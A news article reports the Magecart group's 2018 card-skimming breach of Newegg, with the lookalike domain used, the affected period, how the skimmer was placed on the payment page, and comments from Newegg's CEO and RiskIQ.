Magecart hacking group is back: Newegg customers' data stolen

Magecart uses same credit card skimming technique to steal data from Newegg customers

Hacking group Magecart is responsible for another data breach - the electronic goods retailer Newegg

The infamous hacking group Magecart, which was responsible for highly targeted Ticketmaster^[1] and British Airways^[2] data breaches claimed another victim – major hardware and electronics retailer Newegg. Customers who entered their credit card details during the period of August 14 and September 18 when buying company's merchandise were affected by the breach.

According to researchers from RiskIQ^[3] and Volexity,^[4] similarly to previous attacks, financial theft group targeted eCommerce websites to harvest the valuable, sensitive data and send it out to a remote server. Hackers again used the credit card skimming tactic, which proved extremely successful in the previous attacks. The Magecart group is not only improving their tactics but is also becoming more rampant while claiming more victims using leading companies' websites.

After finding out about the ordeal, Newegg CEO Danny Lee stated the following:

The malware was quite sophisticated and we are conducting extensive research to determine exactly what information may have been acquired or accessed and how many customers may have been impacted.

A sophisticated attack infiltrated users' payment process

Magecart authors started their operation on 13th of August, after creating a domain under the name of neweggstats.com – integrating the name of the retailer to appear legitimate. The next day, they managed to acquire the SSL certificate from Comodo, further increasing the illusion of legitimacy.

Initially, the domain directed to a standard host but was later changed to 217.23.4.11 – hackers' created server there all the accumulated information is stored. On 14th of August, Magecart group inserted a malicious JavaScript into the legitimate Newegg website newegg.com. The process proceeds as follows:

When a customer wants to buy a product they have to go through the following steps:

1. Put a product in their shopping cart
2. Go to the first step of the check-out, entering their delivery information
3. When their address is validated, the customer is taken to the next page: payment processing, where they enter their credit card information.

According to RiskIQ, the hackers managed to insert the credit card skimmer into the checkout process by obfuscating it well. The skimmer was not placed in the script, but the payment processing information instead, making it impossible to detect until the payment page is hit.

Because the skimmer was hidden so well, it stayed in operation for more than a month – until it was removed on the 18th of September.

More questions than answers at the current investigation stage

As mentioned by Newegg's CEO, not much is currently known about the full extent of the attack. However, both desktop and mobile users got affected by the breach, as well as the fact that more than 50 million customers^[5] visit the site each month – the consequences of the breach could be drastic, and millions' of users could be at risk of money and/or identity theft.

Those who entered personal details on the Newegg website during the mentioned period, should immediately contact their bank and block the credit card which was used.

RiskIQ stated concerns about the Magecart group and the dangers of major retailers' eCommerce websites used for payment transactions:

The attack on Newegg shows that while third parties have been a problem for websites—as in the case of the Ticketmaster breach—self-hosted scripts help attackers move and evolve, in this case changing the actual payment processing pages to place their skimmer.